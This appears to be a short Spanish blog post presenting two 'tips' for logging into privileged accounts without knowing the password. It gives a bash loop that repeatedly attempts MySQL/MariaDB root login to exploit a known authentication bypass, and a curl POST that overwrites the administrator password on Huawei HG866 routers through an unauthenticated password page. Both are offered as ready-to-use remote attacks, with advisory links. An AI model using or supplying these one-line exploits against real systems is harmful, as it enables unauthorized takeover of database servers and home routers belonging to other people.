Aquí les dejo dos tips, que te permitirá ingresar a cuentas privilegiadas sin conocer sus respectivas passwords, ambos ataques pueden ser remotos y solo requieren tipear una sola linea en consola.
Caso MySQL/MariaDB: Acceder como root sin conocer el password
Hace unos dias se hizo publico que aplicando fuerza bruta se puede acceder a cualquier cuenta determinada en ciertas versiones de MySQL/MariaDB, solo necesitamos conocer el nombre de usuario de la cuenta a brutear, los mas codiciosos intetarán con "root" (es muy comun encontrarlo habilitado), pero tranquilamente podes intentar con cualquier otro usuario$ while [ 1 ];do mysql -u root --password=123; done
No demora mucho el proceso, ya que la posibilidad de acierto es de 1 en 256 intentos
Para mas información:
http://www.net-security.org/secworld.php?id=13076
Caso Huawei HG866: Acceder como administrador sin conocer el password
Se puede modificar la clave del administrador en el panel de control web de los router Huawei HG866 ya que la sesión de la pagina password.html no se encuentra debidamente controlada$ curl --data "psw=qwerty&reenterpsw=qwerty" http://<ip-router>/html/password.html
Con la linea anterior pisamos la contraseña (desconocida) del administrador por la clave "qwerty" (que dificilmente olvidaremos =)
Para mas información:
http://websec.mx/advisories/view/Evasion_de_autenticacion_en_Huawei_HG866
No hay comentarios:
Publicar un comentario